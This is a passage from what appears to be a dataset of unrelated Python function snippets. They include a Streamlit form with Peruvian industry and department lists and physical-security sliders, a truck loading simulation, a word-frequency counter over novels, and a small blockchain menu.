ARRENDAMIENTO DE VEHÍCULOS AUTOMOTORES', \n 'ARRENDAMIENTO DE PROPIEDAD INTELECTUAL Y PRODUCTOS SIMILARES, EXCEPTO OBRAS PROTEGIDAS POR DERECHOS DE AUTOR', \n 'ARRENDAMIENTO FINANCIERO', \n 'ASERRADOS Y ACEPILLADURA DE MADERA', \n 'CAPTACIÓN, TRATAMIENTO Y DISTRIBUCIÓN DE AGUA', \n 'CONSTRUCCIÓN DE BUQUES Y ESTRUCTURAS FLOTANTES', \n 'CONSTRUCCIÓN DE CARRETERAS Y LÍNEAS DE FERROCARRIL', \n 'CONSTRUCCIÓN DE EDIFICIOS', \n 'CONSTRUCCIÓN DE OTRAS OBRAS DE INGENIERÍA CIVIL', \n 'CONSTRUCCIÓN DE PROYECTOS DE SERVICIO PÚBLICO', \n 'CONSULTORÍA DE INFORMÁTICA Y DE GESTIÓN DE INSTALACIONES INFORMÁTICAS', \n 'CORRETAJE DE VALORES Y DE CONTRATOS DE PRODUCTOS BÁSICOS', \n 'CORTE, TALLA Y ACABADO DE LA PIEDRA', \n 'CURTIDO Y ADOBO DE CUEROS', \n 'DESTILACIÓN, RECTIFICACIÓN Y MEZCLA DE BEBIDAS ALCOHÓLICAS', \n 'EDICIÓN DE LIBROS', \n 'EDICIÓN DE 
PERIÓDICOS, REVISTAS Y OTRAS PUBLICACIONES PERIÓDICAS', \n 'EDUCACIÓN DEPORTIVA Y RECREATIVA', \n 'ELABORACIÒN Y CONSERVACIÓN DE CARNE', \n 'ELABORACIÒN Y CONSERVACIÓN DE FRUTAS,LEGUMBRES Y HORTALIZAS', \n 'ELABORACIÒN Y CONSERVACIÓN DE PESCADOS, CRUSTÁCEOS Y MOLUSCOS', \n 'ELABORACIÓN DE ACEITES Y GRASAS DE ORIGEN VEGETAL Y ANIMAL', \n 'ELABORACIÓN DE AZÚCAR', \n 'ELABORACIÓN DE BEBIDAS MALTEADAS Y DE MALTA', \n 'ELABORACIÓN DE BEBIDAS NO ALCOHÓLICAS', \n 'ELABORACIÓN DE CACAO Y CHOCOLATE Y DE PRODUCTOS DE CONFITERÍA', \n 'ELABORACIÓN DE COMIDAS Y PLATOS PREPARADOS', \n 'ELABORACIÓN DE MACARRONES, FIDEOS, ALCUZCUS Y PRODUCTOS FARINÁCEOS SIMILARES', \n 'ELABORACIÓN DE OTROS PRODUCTOS ALIMENTICIOS N.C.P.', \n 'ELABORACIÓN DE PIENSOS PREPARADOS PARA ANIMALES', \n 'ELABORACIÓN DE PRODUCTOS DE MOLINERÍA.', \n 'ELABORACIÓN DE PRODUCTOS DE PANADERÍA', \n 'ELABORACIÓN DE PRODUCTOS LÁCTEOS', \n 'ELABORACIÓN DE VINOS', \n 'ENSAYOS Y ANÁLISIS TÉCNICOS', \n 'ENSEÑANZA CULTURAL', \n 'ENSEÑANZA PREESCOLAR Y PRIMARIA', \n 'ENSEÑANZA SECUNDARIA DE FORMACIÓN GENERAL', \n 'ENSEÑANZA SECUNDARIA DE FORMACIÓN TÉCNICA Y PROFESIONAL', \n 'ENSEÑANZA SUPERIOR', \n 'ESTUDIOS DE MERCADO Y ENCUESTAS DE OPINIÓN PÚBLICA', \n 'EVACUACIÓN DE AGUAS RESIDUALES', \n 'EXPLOTACIÓN DE OTRAS MINAS Y CANTERAS N.C.P.', \n 'EXTRACCIÓN DE CARBÓN DE PIEDRA', \n 'EXTRACCIÓN DE GAS NATURAL', \n 'EXTRACCIÓN DE MINERALES DE HIERRO', \n 'EXTRACCIÓN DE MINERALES PARA LA FABRICACIÓN DE ABONOS Y PRODUCTOS QUÍMICOS', \n 'EXTRACCIÓN DE OTROS MINERALES METALÍFEROS NO FERROSOS', \n 'EXTRACCIÓN DE PETRÓLEO CRUDO', \n 'EXTRACCIÓN DE PIEDRA, ARENA Y ARCILLA', \n 'EXTRACCIÓN DE SAL', \n 'FABRICACIÓN ABONOS Y COMPUESTOS DE NITRÓGENO', \n 'FABRICACIÓN DE APARATOS DE USO DOMÉSTICO', \n 'FABRICACIÓN DE ARTICULOS DE PUNTO Y GANCHILLO', \n 'FABRICACIÓN DE ARTÍCULOS CONFECCIONADOS DE MATERIALES TEXTILES, EXCEPTO PRENDAS DE VESTIR', \n 'FABRICACIÓN DE ARTÍCULOS DE CUCHILLERÍA, HERRAMIENTAS DE MANO Y ARTÍCULOS DE FERRETERÍA', \n 'FABRICACIÓN DE ARTÍCULOS DE DEPORTE', \n 'FABRICACIÓN DE ARTÍCULOS DE HORMIGÓN, DE CEMENTO Y DE YESO', \n 'FABRICACIÓN DE ARTÍCULOS DE PIEL', \n 'FABRICACIÓN DE BICICLETAS Y DE SILLONES DE RUEDAS PARA INVÁLIDOS', \n 'FABRICACIÓN DE BISUTERÍA Y ARTÍCULOS CONEXOS', \n 'FABRICACIÓN DE BOMBAS, COMPRESORES, GRIFOS Y VÁLVULAS', \n 'FABRICACIÓN DE CALZADO', \n 'FABRICACIÓN DE CARROCERÍAS PARA VEHÍCULOS AUTOMOTORES', \n 'FABRICACIÓN DE CEMENTO, CAL Y YESO', \n 'FABRICACIÓN DE COMPONENTES Y TABLEROS ELECTRÓNICOS', \n 'FABRICACIÓN DE CUBIERTAS Y CÁMARAS DE CAUCHO', \n 'FABRICACIÓN DE CUERDAS, CORDELES, BRAMANTES Y REDES', \n 'FABRICACIÓN DE EQUIPO DE ELEVACIÓN Y MANIPULACIÓN', \n 'FABRICACIÓN DE EQUIPO DE IRRADIACIÓN Y EQUIPO ELECTRÓNICO DE USO MÉDICO Y TERAPÉUTICO', \n 'FABRICACIÓN DE EQUIPO ELÉCTRICO DE ILUMINACIÓN', \n 'FABRICACIÓN DE FIBRAS ARTIFICIALES', \n 'FABRICACIÓN DE HERRAMIENTAS DE MANO MOTORIZADAS', \n 'FABRICACIÓN DE HOJAS DE MADERA PARA ENCHAPADO Y TABLEROS A BASE DE MADERA', \n 'FABRICACIÓN DE INSTRUMENTOS Y MATERIALES MÉDICOS Y ODONTOLÓGICOS', \n 'FABRICACIÓN DE INSTRUMENTOS ÓPTICOS Y EQUIPO FOTOGRÁFICO', \n 'FABRICACIÓN DE JABONES Y DETERGENTES, PREPARADOS PARA LIMPIAR Y PULIR, PERFUMES Y PREPARADOS DE TOCADOR.', \n 'FABRICACIÓN DE JOYAS Y ARTÍCULOS CONEXOS', \n 'FABRICACIÓN DE JUEGOS Y JUGUETES', \n 'FABRICACIÓN DE MALETAS, BOLSOS DE MANO, Y ARTÍCULOS SIMILARES,Y DE ARTICULOS DE TALABARTERÍA Y GUARNICIONERÍA', \n 'FABRICACIÓN DE MAQUINARIA AGROPECUARIA Y FORESTAL', \n 'FABRICACIÓN DE MAQUINARIA METALÚRGICA', \n 
'FABRICACIÓN DE MAQUINARIA PARA EXPLOTACIÓN DE MINAS Y CANTERAS Y PARA OBRAS DE CONSTRUCCIÓN', \n 'FABRICACIÓN DE MAQUINARIA PARA LA ELABORACIÓN DE ALIMENTOS, BEBIDAS Y TABACO', \n 'FABRICACIÓN DE MATERIALES DE CONSTRUCCIÓN DE ARCILLA', \n 'FABRICACIÓN DE MOTOCICLETAS', \n 'FABRICACIÓN DE MOTORES Y TURBINAS, EXCEPTO MOTORES PARA AERONAVES, VEHÍCULOS AUTOMOTORES Y MOTOCICLETAS', \n 'FABRICACIÓN DE MOTORES, GENERADORES Y TRANSFORMADORES ELÉCTRICOS Y APARATOS DE DISTRIBUCIÓN Y CONTROL DE LA ENERGÍA ELÉCTRICA', \n 'FABRICACIÓN DE MUEBLES', \n 'FABRICACIÓN DE OTROS ARTÍCULOS DEL PAPEL Y CARTÓN', \n 'FABRICACIÓN DE OTROS HILOS Y CABLES ELÉCTRICOS', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE CAUCHO', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE MADERA; FABRICACIÓN DE ARTÍCULOS DE CORCHO, PAJA Y MATERIALES TRENZABLES.', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE PORCELANA Y DE CERÁMICA', \n 'FABRICACIÓN DE OTROS PRODUCTOS ELABORADOS DE METAL N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS MINERALES NO METÁLICOS N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS QUÍMICOS N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS TEXTILES N.C.P.', \n 'FABRICACIÓN DE OTROS TIPOS DE EQUIPO DE TRANSPORTE N.C.P.', \n 'FABRICACIÓN DE OTROS TIPOS DE EQUIPO ELÉCTRICO', \n 'FABRICACIÓN DE OTROS TIPOS DE MAQUINARIA DE USO ESPECIAL', \n 'FABRICACIÓN DE OTROS TIPOS DE MAQUINARIA DE USO GENERAL', \n 'FABRICACIÓN DE PARTES Y PIEZAS DE CARPINTERÍA PARA EDIFICIOS Y CONSTRUCCIONES', \n 'FABRICACIÓN DE PARTES, PIEZAS Y ACCESORIOS PARA VEHÍCULOS DE AUTOMOTORES', \n 'FABRICACIÓN DE PASTA DE MADERA, PAPEL Y CARTÓN', \n 'FABRICACIÓN DE PILAS, BATERÍAS Y ACUMULADORES', \n 'FABRICACIÓN DE PINTURAS, BARNICES Y PRODUCTOS DE REVESTIMIENTO SIMILARES, TINTAS DE IMPRENTA Y MASILLAS', \n 'FABRICACIÓN DE PLAGUICIDAS Y OTROS PRODUCTOS QUÍMICOS DE USO AGROPECUARIO', \n 'FABRICACIÓN DE PLÁSTICOS Y DE CAUCHO SINTÉTICO EN FORMAS PRIMARIAS', \n 'FABRICACIÓN DE PRENDAS DE VESTIR, EXCEPTO PRENDAS DE PIEL', \n 'FABRICACIÓN DE PRODUCTOS DE LA REFINACIÓN DEL PETRÓLEO', \n 'FABRICACIÓN DE PRODUCTOS DE PLÁSTICO', \n 'FABRICACIÓN DE PRODUCTOS FARMACÉUTICOS, SUSTANCIAS QUÍMICAS MEDICINALES Y PRODUCTOS BOTÁNICOS DE USO FARMACÉUTICO', \n 'FABRICACIÓN DE PRODUCTOS METÁLICOS PARA USO ESTRUCTURAL', \n 'FABRICACIÓN DE PRODUCTOS PRIMARIOS DE METALES PRECIOSOS Y OTROS METALES NO FERROSOS', \n 'FABRICACIÓN DE PRODUCTOS REFRACTARIOS', \n 'FABRICACIÓN DE RECIPIENTES DE MADERA', \n 'FABRICACIÓN DE SUSTANCIAS QUÍMICAS BÁSICAS', \n 'FABRICACIÓN DE TANQUES, DEPÓSITOS Y RECIPIENTES DE METAL', \n 'FABRICACIÓN DE TAPICES Y ALFOMBRAS', \n 'FABRICACIÓN DE TEJIDOS DE PUNTO Y GANCHILLO', \n 'FABRICACIÓN DE VEHÍCULOS AUTOMOTORES', \n 'FABRICACIÓN DE VIDRIO Y DE PRODUCTOS DE VIDRIO', \n 'FABRICACIÓN DEL GAS', \n 'FABRICACIÓN DEL PAPEL Y CARTÓN ONDULADO Y DE ENVASES DE PAPEL Y CARTÓN', \n 'FONDOS DE PENSIONES', \n 'FONDOS Y SOCIEDADES DE INVERSIÓN Y ENTIDADES FINANCIERAS SIMILARES', \n 'FORJA, PRENSADO, ESTAMPADO Y LAMINADO DE METALES; PULVIMETALURGIA', \n 'FOTOCOPIADO, PREPARACIÓN DE DOCUMENTOS Y OTRAS ACTIVIDADES ESPECIALIZADAS DE APOYO DE OFICINA', \n 'FUNDICIÓN DE HIERRO Y ACERO', \n 'FUNDICIÓN DE METALES NO FERROSOS', \n 'GENERACIÓN, TRANSMISIÓN Y DISTRIBUCIÓN DE ENERGÍA ELÉCTRICA', \n 'GESTIÓN DE INSTALACIONES DEPORTIVAS', \n 'IMPRESIÓN', \n 'INDUSTRIAS BÁSICAS DE HIERRO Y ACERO', \n 'INSTALACIONES DE FONTANERÍA, CALEFACCIÓN Y AIRE ACONDICIONADO', \n 'INSTALACIONES ELÉCTRICAS', \n 'INSTALACIÓN DE MAQUINARIA Y EQUIPO INDUSTRIALES', \n 'INVESTIGACIÓN Y DESARROLLO EXPERIMENTAL EN EL CAMPO DE LAS CIENCIAS 
NATURALES Y LA INGENIERÍA', \n 'INVESTIGACIÓN Y DESARROLLO EXPERIMENTAL EN EL CAMPO DE LAS CIENCIAS SOCIALES Y LAS HUMANIDADES', \n 'LAVADO Y LIMPIEZA, INCLUIDA LA LIMPIEZA EN SECO, DE PRODUCTOS TEXTILES Y DE PIEL', \n 'LIMPIEZA GENERAL DE EDIFICIOS', \n 'MANIPULACIÓN DE CARGA', \n 'MANTENIMIENTO Y REPARACIÓN DE VEHÍCULOS AUTOMOTORES', \n 'ORGANIZACIÓN DE CONVENCIONES Y EXPOSICIONES COMERCIALES', \n 'OTRAS ACTIVIDADES AUXILIARES DE LAS ACTIVIDADES DE SEGUROS Y FONDOS DE PENSIONES', \n 'OTRAS ACTIVIDADES AUXILIARES DE LAS ACTIVIDADES DE SERVICIOS FINANCIEROS', \n 'OTRAS ACTIVIDADES DE ALOJAMIENTO', \n 'OTRAS ACTIVIDADES DE APOYO AL TRANSPORTE', \n 'OTRAS ACTIVIDADES DE ASISTENCIA SOCIAL SIN ALOJAMIENTO', \n 'OTRAS ACTIVIDADES DE ATENCIÓN DE LA SALUD HUMANA', \n 'OTRAS ACTIVIDADES DE ATENCIÓN EN INSTITUCIONES', \n 'OTRAS ACTIVIDADES DE CONCESIÓN DE CRÉDITO', \n 'OTRAS ACTIVIDADES DE DOTACIÓN DE RECURSOS HUMANOS', \n 'OTRAS ACTIVIDADES DE EDICIÓN', \n 'OTRAS ACTIVIDADES DE ESPARCIMIENTO Y RECREATIVAS N.C.P.', \n 'OTRAS ACTIVIDADES DE LIMPIEZA DE EDIFICIOS E INSTALACIONES INDUSTRIALES', \n 'OTRAS ACTIVIDADES DE SERVICIO DE COMIDAS', \n 'OTRAS ACTIVIDADES DE SERVICIOS DE APOYO A LAS EMPRESAS N.C.P', \n 'OTRAS ACTIVIDADES DE SERVICIOS DE INFORMACIÓN N.C.P.', \n 'OTRAS ACTIVIDADES DE SERVICIOS FINANCIEROS, EXCEPTO LAS DE SEGUROS Y FONDOS DE PENSIONES, N.C.P.', \n 'OTRAS ACTIVIDADES DE SERVICIOS PERSONALES N.C.P.', \n 'OTRAS ACTIVIDADES DE TECNOLOGÍA DE LA INFORMACIÓN Y DE SERVICIOS INFORMÁTICOS', \n 'OTRAS ACTIVIDADES DE TELECOMUNICACIÓN.', \n 'OTRAS ACTIVIDADES DE TRANSPORTE POR VÍA TERRESTRE', \n 'OTRAS ACTIVIDADES DE VENTA AL POR MENOR EN COMERCIOS NO ESPECIALIZADOS', \n 'OTRAS ACTIVIDADES DE VENTA AL POR MENOR NO REALIZADAS EN COMERCIOS, PUESTOS DE VENTA O MERCADOS', \n 'OTRAS ACTIVIDADES DEPORTIVAS', \n 'OTRAS ACTIVIDADES ESPECIALIZADAS DE LA CONSTRUCCIÓN', \n 'OTRAS ACTIVIDADES PROFESIONALES, CIENTÍFICAS Y TÉCNICAS N.C.P.', \n 'OTRAS INDUSTRIAS MANUFACTURERAS N.C.P.', \n 'OTRAS INSTALACIONES PARA OBRAS DE CONSTRUCCIÓN', \n 'OTROS SERVICIOS DE RESERVAS Y ACTIVIDADES CONEXAS', \n 'OTROS TIPOS DE ENSEÑANZA N.C.P.', \n 'OTROS TIPOS DE INTERMEDIACIÓN MONETARIA.', \n 'PELUQUERÍA Y OTROS TRATAMIENTOS DE BELLEZA', \n 'PESCA DE AGUA DULCE', \n 'PESCA MARÍTIMA', \n 'POMPAS FÚNEBRES Y ACTIVIDADES CONEXAS', \n 'PORTALES WEB', \n 'PREPARACIÓN DEL TERRENO', \n 'PREPARACIÓN E HILATURA DE FIBRAS TEXTILES', \n 'PROCESAMIENTO DE DATOS, HOSPEDAJE Y ACTIVIDADES CONEXAS', \n 'PROGRAMACIÓN INFORMÁTICA', \n 'PROGRAMACIÓN Y TRANSMISIONES DE TELEVISIÓN', \n 'PUBLICIDAD', \n 'RECOGIDA DE DESECHOS NO PELIGROSOS', \n 'RECOGIDA DE DESECHOS PELIGROSOS', \n 'RECUPERACIÓN DE MATERIALES', \n 'REPARACIÓN DE APARATOS DE USO DOMÉSTICO Y EQUIPO DOMÉSTICO Y DE JARDINERÍA', \n 'REPARACIÓN DE APARATOS ELECTRÓNICOS DE CONSUMO', \n 'REPARACIÓN DE EQUIPO DE TRANSPORTE, EXCEPTO VEHÍCULOS AUTOMOTORES', \n 'REPARACIÓN DE EQUIPO ELÉCTRICO', \n 'REPARACIÓN DE EQUIPOS COMUNICACIONALES', \n 'REPARACIÓN DE MAQUINARIA', \n 'REPARACIÓN DE ORDENADORES Y EQUIPO PERIFÉRICO', \n 'REPARACIÓN DE OTROS TIPOS DE EQUIPO', \n 'REPARACIÓN DE PRODUCTOS ELABORADOS DE METAL', \n 'SEGUROS DE VIDA', \n 'SEGUROS GENERALES', \n 'SUMINISTRO DE COMIDAS POR ENCARGO', \n 'SUMINISTRO DE VAPOR Y AIRE ACONDICIONADO', \n 'TEJEDURA DE PRODUCTOS TEXTILES', \n 'TERMINACIÓN Y ACABADO DE EDIFICIOS', \n 'TRANSMISIONES DE RADIO', \n 'TRANSPORTE DE CARGA MARÍTIMO Y DE CABOTAJE', \n 'TRANSPORTE DE CARGA POR CARRETERA', \n 'TRANSPORTE DE CARGA POR FERROCARRIL', \n 'TRANSPORTE 
DE CARGA POR VÍA AÉREA', \n 'TRANSPORTE DE CARGA, POR VÍAS DE NAVEGACIÓN INTERIORES', \n 'TRANSPORTE DE PASAJEROS MARÍTIMO Y DE CABOTAJE', \n 'TRANSPORTE DE PASAJEROS POR VÍA AÉREA', \n 'TRANSPORTE DE PASAJEROS POR VÍAS DE NAVEGACIÓN INTERIORES', \n 'TRANSPORTE INTERURBANO DE PASAJEROS POR FERROCARRIL', \n 'TRANSPORTE URBANO Y SUBURBANO DE PASAJEROS POR VÍA TERRESTRE', \n 'TRATAMIENTO Y ELIMINACIÓN DE DESECHOS NO PELIGROSOS', \n 'TRATAMIENTO Y ELIMINACIÓN DE DESECHOS PELIGROSOS', \n 'TRATAMIENTO Y REVESTIMIENTO DE METALES', \n 'VENTA AL POR MAYOR A CAMBIO DE UNA RETRIBUCIÓN O POR CONTRATA', \n 'VENTA AL POR MAYOR DE ALIMENTOS, BEBIDAS Y TABACO.', \n 'VENTA AL POR MAYOR DE COMBUSTIBLES SÓLIDOS, LÍQUIDOS Y GASEOSOS Y PRODUCTOS CONEXOS', \n 'VENTA AL POR MAYOR DE DESPERDICIOS, DESECHOS, CHATARRA Y OTROS PRODUCTOS N.C.P', \n 'VENTA AL POR MAYOR DE EQUIPO, PARTES Y PIEZAS ELECTRÓNICOS Y DE TELECOMUNICACIONES', \n 'VENTA AL POR MAYOR DE MAQUINARIA, EQUIPO Y MATERIALES AGROPECUARIOS', \n 'VENTA AL POR MAYOR DE MATERIALES DE CONSTRUCCIÓN, ARTÍCULOS DE FERRETERÍA Y EQUIPO Y MATERIALES DE FONTANERÍA Y CALEFACCIÓN.', \n 'VENTA AL POR MAYOR DE MATERIAS PRIMAS AGROPECUARIAS Y ANIMALES VIVOS.', \n 'VENTA AL POR MAYOR DE METALES Y MINERALES METALÍFEROS', \n 'VENTA AL POR MAYOR DE ORDENADORES, EQUIPO PERIFÉRICO Y PROGRAMAS DE INFORMÁTICA', \n 'VENTA AL POR MAYOR DE OTROS ENSERES DOMÉSTICOS', \n 'VENTA AL POR MAYOR DE OTROS TIPOS DE MAQUINARIA Y EQUIPO', \n 'VENTA AL POR MAYOR DE PRODUCTOS TEXTILES, PRENDAS DE VESTIR Y CALZADO', \n 'VENTA AL POR MAYOR NO ESPECIALIZADA', \n 'VENTA AL POR MENOR DE ALIMENTOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ALIMENTOS, BEBIDAS Y TABACO EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR DE APARATOS ELÉCTRICOS DE USO DOMÉSTICO, MUEBLES, EQUIPO DE ILUMINACIÓN Y OTROS ENSERES DOMÉSTICOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ARTÍCULOS DE FERRETERÍA, PINTURAS Y PRODUCTOS DE VIDRIO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE BEBIDAS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE COMBUSTIBLES PARA VEHÍCULOS AUTOMOTORES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE EQUIPO DE DEPORTE EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE EQUIPO DE SONIDO Y DE VÍDEO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE LIBROS, PERIÓDICOS Y ARTÍCULOS DE PAPELERÍA EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ORDENADORES, EQUIPO PERIFÉRICO, PROGRAMAS INFORMÁTICOS Y EQUIPO DE TELECOMUNICACIONES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE OTROS PRODUCTOS EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR DE OTROS PRODUCTOS NUEVOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRENDAS DE VESTIR, CALZADO Y ARTÍCULOS DE CUERO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS FARMACÉUTICOS Y MEDICINALES, COSMÉTICOS Y ARTÍCULOS DE TOCADOR EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS TEXTILES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS TEXTILES, PRENDAS DE VESTIR Y CALZADO EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR EN COMERCIOS NO ESPECIALIZADOS CON PREDOMINIO DE LA VENTA DE ALIMENTOS, BEBIDAS O TABACO', \n 'VENTA AL POR MENOR POR CORREO Y POR INTERNET', \n #'VENTA DE VEHÍCULOS AUTOMOTORES' 128\n #'VENTA, MANTENIMIENTO Y REPARACIÓN DE MOTOCICLETAS Y DE SUS PARTES, PIEZAS Y ACCESORIOS.', \n #'VENTAS DE PARTES, PIEZAS Y ACCESORIOS PARA VEHÍCULOS AUTOMOTORES'\n ])\n Departament = st.sidebar.selectbox('Nombre del 
Departamento', ['AMAZONAS','AREQUIPA','ÁNCASH','APURÍMAC','AYACUCHO','HUANCAVELICA','HUÁNUCO','JUNÍN','MADRE DE DIOS','MOQUEGUA','PASCO','SAN MARTÍN','TACNA','TUMBES','UCAYALI','PUNO','LIMA','CALLAO','CUSCO','LA LIBERTAD','JUNÍN','CAJAMARCA','LAMBAYEQUE','LORETO'])\n Tama = st.sidebar.selectbox('Tamaño de Empresa', ['MICRO', 'PEQUEÑA','MEDIANA','GRANDE'])\n st.sidebar.header('Seguridad: No(0), Si(1))') \n F1 = st.sidebar.slider('Infraestructura física (alambrado, muros, etc.?', 0,1)\n F2 = st.sidebar.slider('Sistema de video y captura de imágenes?', 0,1)\n F3 = st.sidebar.slider('Sistema de control de acceso de personal?', 0,1)\n F4 = st.sidebar.slider('Sistema de alarma de seguridad electrónica?', 0,1)\n F5 = st.sidebar.slider('Seguridad para el traslado de valores?', 0,1)\n F6 = st.sidebar.slider('Seguridad para el traslado de bienes?', 0,1)\n F7 = st.sidebar.slider('Personal para resguardo (guardaespaldas)?',0,1)\n F8 = st.sidebar.slider('Personal de seguridad de bienes e inmuebles?', 0,1)\n \n features = {'acti2': acti2\t,\n 'Departament': Departament,\n 'Tama': Tama,\n 'F1': F1,\n 'F2': F2,\n 'F3': F3,\n 'F4': F4,\n 'F5': F5,\n 'F6': F6,\n 'F7': F7,\n 'F8': F8}\n data = pd.DataFrame(features,index=[0])\n\n return data", "def manipular_sacos(self, camion):\r\n operaciones = self.operaciones[\"Operaciones manipuleo\"]\r\n\r\n # Manipuleo de camion por cargar\r\n if camion.tipo == \"Carga\":\r\n\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 100))\r\n\r\n # Si el camion espera procede con un tranbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Sacos\"]\r\n carga = operaciones[\"Carga a pulso - Sacos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, 200,\r\n carga, self.medios_almacenamiento[\"Almacen 2\"], 200))\r\n\r\n # Manipuleo de camion por descargar\r\n elif camion.tipo == \"Descarga\":\r\n\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 100))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Sacos\"]\r\n descarga = operaciones[\"Descarga a pulso - Sacos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, 200,\r\n descarga, self.medios_almacenamiento[\"Almacen 2\"], 200))", "def intro():\r\n\r\n print(term.home + term.on_white + term.clear)\r\n Joueur_1 = input(term.black + 'Pseudo joueur 1 : ')\r\n Joueur_2 = input(term.black + 'Pseudo joueur 2 : ')\r\n print (term.black + 'Que le meilleur gagne!')\r\n print (term.black + '**********************')", "def load():\n messagebox.showinfo(\"Information\", \"Veuillez entrer le nom du fichier dans la console.\")\n file_name = input(\"Nom du fichier : \")\n ferme_fenetre()\n Hitori(file_name)", "def agregar_bolsa(self, letra, cantidad):", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada 
texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def apilar(pila, dato):\n pila.tope += 1\n pila.datos[pila.tope] = dato", "def iniciar_aplicacion():\n continuar = True\n blockchain = []\n while continuar:\n mostrar_menu()\n opcion_seleccionada = int(input(\"Por favor seleccione una opción: \"))\n if opcion_seleccionada == 1:\n blockchain = ejecutar_cargar_blockchain_cupicoin()\n elif opcion_seleccionada == 2:\n ejecutar_agregar_transaccion(blockchain)\n elif opcion_seleccionada == 3:\n ejecutar_agregar_nuevo_bloque(blockchain)\n elif opcion_seleccionada == 4:\n ejecutar_contar_veces_aparece_cuenta(blockchain)\n elif opcion_seleccionada == 5:\n ejecutar_buscar_transaccion(blockchain)\n elif opcion_seleccionada == 6:\n 
